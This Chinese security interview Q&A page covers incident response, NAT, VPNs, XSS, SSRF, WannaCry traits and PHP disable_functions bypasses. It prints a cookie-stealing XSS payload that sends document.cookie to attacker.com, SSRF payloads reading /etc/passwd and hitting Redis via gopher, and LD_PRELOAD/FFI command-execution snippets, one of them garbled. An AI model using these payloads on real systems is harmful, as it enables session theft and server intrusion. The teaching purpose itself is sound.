安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[七十三、TCP vs UDP 及 SYN攻击](#七十三、TCP vs UDP 及 SYN攻击)
[八十二、Frida vs Xposed](#八十二、Frida vs Xposed)
八十九-九十、绕过disable_functions执行命令
六十一、主机被入侵,你会如何处理这件事自查解决方案: 六十二、 NAT(网络地址转换)协议 六十三、内网穿透 六十四、虚拟专用网络 六十五、二层交换机 六十六、路由技术 六十七、三层交换机 六十八、IPv6 地址表示 六十九、对称加密非对称加密? 七十、什么是同源策略? 七十一、cookie 存在哪里?可以打开吗 七十二、xss 如何盗取 cookie? 七十三、tcp、udp 的区别及 tcp 三次握手,syn 攻击? 七十四、证书要考哪些? 七十五、DVWA 是如何搭建的? 七十六、渗透测试的流程是什么 七十七、xss 如何防御 七十八、IIS 服务器应该做哪些方面的保护措施: 七十九、虚拟机的几种连接方式及原理 八十、xss 有 cookie 一定可以无用户名密码登录吗? 八十一、 JNI 函数在 java 中函数名为 com.didi.security.main,C 中的函数名是什么样的? 八十二、Frida 和 Xposed 框架? 八十三、SSRF 利用方式? 八十四、宏病毒? 八十五、APP 加壳? 八十六、勒索软件 Wanacry 的特征?蠕虫、僵尸病毒 八十七、ARM32 位指令中,返回值和返回地址保存在哪个寄存器中? 八十八、HTTPS 握手过程中用到哪些技术? 八十九、Linux 中 PHP 环境,已知 disable_functions=exec,passthrupopen,proc_open,shell_exec,system, 九十、请写出两种有可能实现任意命令执行的方式?六十一、主机被入侵处理流程
- 隔离断网:立即断开主机网络(禁用网卡/防火墙阻断)
- 取证备份 :磁盘镜像、内存dump、系统日志(
/var/log/、Windows事件日志)- 入侵分析 :
- 检查异常进程(
ps -ef/tasklist)- 排查启动项(
crontab/msconfig)- 分析网络连接(
netstat -antp)- 漏洞定位 :检查未修复漏洞、弱口令、后门文件(如
.bashrc恶意注入)- 恢复重建:重装系统、修补漏洞、更改所有关联密码
六十二、NAT(网络地址转换)
类型 原理 应用场景 静态NAT 1个私网IP固定映射1个公网IP 服务器对外发布 动态NAT IP池动态分配公网地址 企业内网共享上网 PAT(NAPT) 多私网IP通过端口映射到1个公网IP 家庭路由器常用
六十三、内网穿透
原理 :通过公网服务器中转流量,绕过防火墙限制
工具:
- Ngrok :建立反向隧道,将内网服务暴露至
xxx.ngrok.io- Frp :通过客户端(frpc)与服务端(frps)实现端口映射
风险:可能暴露内部服务,需配置访问认证
六十四、虚拟专用网络(VPN)
类型 协议 特点 IPSec VPN IKEv2/IPSec 网络层加密,支持站点到站点 SSL VPN TLS/DTLS 应用层加密,无需客户端 WireGuard UDP+噪声协议 高性能,现代加密算法
六十五-六十七、交换机与路由技术
设备 工作层级 核心功能 二层交换机 数据链路层 MAC地址学习,VLAN划分 路由器 网络层 IP路由转发,NAT,ACL 三层交换机 网络层 融合交换与路由,支持VLAN间路由
六十八、IPv6地址表示
- 压缩规则 :省略前导0,连续0块用
::代替(仅限一次) 例:2001:0db8:0000:0000:0000:ff00:0042:8329→2001:db8::ff00:42:8329- 前缀 :
/64通常用于子网划分
六十九、加密方式对比
特性 对称加密(AES) 非对称加密(RSA) 密钥数量 1个共享密钥 公钥+私钥对 速度 快(适合大数据) 慢(适合密钥交换) 典型应用 文件加密、HTTPS内容加密 数字签名、SSL密钥协商
七十、同源策略(SOP)
定义 :禁止网页脚本访问不同源(协议+域名+端口均相同)的资源
绕过方法:
- CORS(服务端设置
Access-Control-Allow-Origin)- JSONP(利用
<script>标签跨域)
七十一、Cookie存储与访问
- 存储位置 :
- 浏览器本地(Chrome:
chrome://settings/siteData)- 文件路径(Windows:
%AppData%\Local\Google\Chrome\User Data\Default\Cookies)- 能否打开:可直接查看(需SQLite工具打开),但内容通常加密
七十二、XSS盗取Cookie流程
- 攻击者注入恶意脚本:
<script>fetch('https://attacker.com?cookie='+document.cookie)</script>- 用户访问含恶意脚本页面
- 浏览器自动发送Cookie至攻击者服务器
防御 :设置Cookie为HttpOnly(禁止JS访问)
七十三、TCP vs UDP 及 SYN攻击
对比项 TCP(传输控制协议) UDP(用户数据报协议) 连接性 面向连接(三次握手) 无连接 可靠性 丢包重传、顺序保证 不保证可靠性 应用场景 Web、邮件等可靠传输 视频流、DNS查询 TCP三次握手:
- Client → Server:
SYN=1, seq=x- Server → Client:
SYN=1, ACK=1, seq=y, ack=x+1- Client → Server:
ACK=1, seq=x+1, ack=y+1SYN攻击:伪造大量SYN包耗尽服务器资源,防御方案:
- SYN Cookie(不保存半连接状态)
- 限制每秒SYN请求数
七十四、网络安全证书推荐
证书 方向 等级 CEH 渗透测试 入门 OSCP 实战渗透 进阶 CISSP 安全管理 高级 CISP(中国) 信息安全认证 国家级
七十五、DVWA搭建步骤
环境:Apache + PHP 5.4-7.x + MySQL
步骤:
bashwget https://github.com/digininja/DVWA/archive/master.zip unzip master.zip mv DVWA-master /var/www/html/dvwa chmod -R 777 /var/www/html/dvwa/config/访问
http://localhost/dvwa/setup.php创建数据库
七十六、渗透测试流程(PTES标准)
- 情报收集 :Whois扫描、子域名爆破(如
subfinder)- 威胁建模:确定高危资产(如暴露的API接口)
- 漏洞分析 :结合
Nessus扫描与手动测试- 渗透利用 :使用
Metasploit、自定义EXP- 后渗透:权限维持(如添加后门账户)
- 报告输出:包含风险等级(CVSS评分)及修复建议
七十七、XSS防御方案
- 输入过滤 :移除
<script>、onerror等危险标签- 输出编码 :HTML实体化(如
<→<)- CSP策略 :设置
Content-Security-Policy: default-src 'self'- HttpOnly Cookie:防止JS读取敏感Cookie
七十八、IIS服务器防护
- 权限控制 :应用程序池账户降权(非
Administrator)- 配置加固 :
- 关闭不必要的扩展(如
.asp若未使用)- 设置请求过滤(拒绝
../路径穿越)- 日志审计 :启用详细访问日志 + 实时监控(如
ELK)
七十九、虚拟机连接方式
方式 原理 典型场景 NAT 虚拟机共享宿主机IP 单机上网 桥接模式 虚拟机直接接入物理网络 模拟真实网络环境 Host-Only 仅宿主机与虚拟机互通 安全测试隔离环境
八十、XSS盗Cookie登录条件
不一定成功,需满足:
- Cookie未过期且未启用
Secure(仅限HTTPS)- 目标系统仅依赖Cookie认证(无二次验证)
- 攻击者能构造有效会话(如
Session Fixation)
八十一、JNI函数名转换规则
C函数名格式:
Java_{包名}_{类名}_{方法名}
示例:
c`// Java: com.didi.security.main JNIEXPORT void JNICALL Java_com_didi_security_main(JNIEnv *env, jobject obj); `⚠️ 包名中的
.需替换为_
八十二、Frida vs Xposed
框架 注入方式 优势 Frida 动态注入(运行时) 支持多平台(Android/iOS) Xposed 静态劫持(Zygote) 无需修改APK,稳定性高
八十三、SSRF利用方式
- 内网探测 :
http://vuln.com/?url=http://192.168.1.1:8080- 协议利用 :
file:///etc/passwd(读取本地文件)gopher://攻击Redis未授权访问- 绕过技巧 :使用DNS重绑定或进制IP编码(
2130706433→127.0.0.1)
八十四、宏病毒
原理 :利用Office宏脚本(VBA)执行恶意代码
传播 :诱导用户启用宏(如"文档预览需启用宏")
防御:禁用Office宏执行 + 启用受保护的视图
八十五、APP加壳
目的 :防止反编译(代码混淆、反调试)
类型:
- 压缩壳:UPX(体积压缩)
- 加密壳:DexProtector(运行时解密代码)
八十六、WannaCry特征
- 传播方式:利用EternalBlue漏洞(SMB协议)
- 行为特征 :
- 加密文件扩展名变更为
.WNCRYT- 内存驻留进程
tasksche.exe- 勒索信息文件
@Please_Read_Me@.txt- 蠕虫属性:自动扫描内网传播,形成僵尸网络
八十七、ARM32寄存器用途
- 返回值 :
R0(32位)、R0-R1(64位)- 返回地址 :
LR(Link Register,即R14)
八十八、HTTPS握手技术
- 非对称加密:RSA/ECDH协商会话密钥
- 证书验证:CA链校验(X.509标准)
- 对称加密:生成AES会话密钥加密传输
- 完整性校验:HMAC算法防篡改
八十九-九十、绕过disable_functions执行命令
方式1:LD_PRELOAD劫持
php`// evil.c #include <stdlib.h> void system() { system("id > /tmp/pwned"); } bash``gcc -shared -fPIC evil.c -o evil.so PHP_VALUE auto_prepend_file="/tmp/evil.php" // 通过环境变量注入 `方式2:FFI(PHP 7.4+)
php`$ffi = FFI::cdef("int system(const char *command);"); $ffi->system("touch /tmp/pwned"); `️ 需服务器安装
php-ffi扩展且未禁用FFI